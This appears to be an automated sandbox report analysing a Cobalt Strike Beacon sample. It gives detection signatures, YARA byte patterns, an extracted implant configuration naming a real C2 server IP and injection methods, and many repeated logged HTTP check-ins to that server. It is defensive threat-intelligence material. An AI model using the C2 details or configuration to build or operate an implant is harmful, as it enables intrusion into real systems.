Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
beacon_x64.exe

Overview

General Information

Sample name:beacon_x64.exe
Analysis ID:1587366
MD5:af51e1dba9c7da4626ae4aac6e61a070
SHA1:50bc787b1122f42e10c93814a51c8eee77d8d0bc
SHA256:fca02dc798d591881b8f1eed5049339bca51fe7f6fffbda288076518da147e1b
Tags:CobaltStrikeexeuser-lontze7
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Contains functionality to call native functions
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • beacon_x64.exe (PID: 6456 cmdline: "C:\Users\user\Desktop\beacon_x64.exe" MD5: AF51E1DBA9C7DA4626AE4AAC6E61A070)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTP"], "Port": 80, "SleepTime": 15024, "MaxGetSize": 3341464, "Jitter": 45, "C2Server": "8.148.6.140,/api/v1/get", "HttpPostUri": "/api/v1/post", "Malleable_C2_Instructions": ["Base64 decode"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%allusersprofile%\\CrashReport\\CrashReport.exe", "Spawnto_x64": "%allusersprofile%\\CrashReport\\CrashReport64.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 666666666, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 10192, "ProcInject_PrependAppend_x86": ["Dx+EAAAAAAAPHwAPH0QAAJAPH4QAAAAAAA==", "Dx9EAAAPH0QAAA8fAA8fgAAAAABmDx9EAABmDx+EAAAAAAAPH0AADx9AAA8fQAA="], "ProcInject_PrependAppend_x64": ["kA8fQAAPH4QAAAAAAGYPH0QAAA8fQAAPH4QAAAAAAJBmDx+EAAAAAAAPH0QAAJAPHwAPH4AAAAAADx9AAA8fQABQWGaQZg8fhAAAAAAAZg8fhAAAAAAADx8A", "Dx+AAAAAAA8fhAAAAAAADx9EAABmDx9EAACQDx9EAAAPH4AAAAAAUFgPH4AAAAAADx8ADx+AAAAAAA8fgAAAAAAPH0AADx8AZg8fRAAADx9EAAAPH4QAAAAAAA8fQACQkA=="], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
SourceRuleDescriptionAuthorStrings
00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
    00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_b54b94acRule for beacon sleep obfuscation routineunknown
    • 0x137:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
    00000000.00000003.2114029429.00000000001A0000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
    • 0x18990:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
    • 0x19cc1:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
    00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
    • 0x1c93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: beacon_x64.exeAvira: detected
    Source: 00000000.00000003.2114029429.00000000001A0000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 80, "SleepTime": 15024, "MaxGetSize": 3341464, "Jitter": 45, "C2Server": "8.148.6.140,/api/v1/get", "HttpPostUri": "/api/v1/post", "Malleable_C2_Instructions": ["Base64 decode"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%allusersprofile%\\CrashReport\\CrashReport.exe", "Spawnto_x64": "%allusersprofile%\\CrashReport\\CrashReport64.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 666666666, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 10192, "ProcInject_PrependAppend_x86": ["Dx+EAAAAAAAPHwAPH0QAAJAPH4QAAAAAAA==", "Dx9EAAAPH0QAAA8fAA8fgAAAAABmDx9EAABmDx+EAAAAAAAPH0AADx9AAA8fQAA="], "ProcInject_PrependAppend_x64": ["kA8fQAAPH4QAAAAAAGYPH0QAAA8fQAAPH4QAAAAAAJBmDx+EAAAAAAAPH0QAAJAPHwAPH4AAAAAADx9AAA8fQABQWGaQZg8fhAAAAAAAZg8fhAAAAAAADx8A", "Dx+AAAAAAA8fhAAAAAAADx9EAABmDx9EAACQDx9EAAAPH4AAAAAAUFgPH4AAAAAADx8ADx+AAAAAAA8fgAAAAAAPH0AADx8AZg8fRAAADx9EAAAPH4QAAAAAAA8fQACQkA=="], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
    Source: beacon_x64.exeReversingLabs: Detection: 84%
    Source: beacon_x64.exeVirustotal: Detection: 79%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: beacon_x64.exeJoe Sandbox ML: detected
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 4x nop then sub rsp, 28h0_2_00402314

    Networking

    barindex
    Source: Malware configuration extractorURLs: 8.148.6.140
    Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
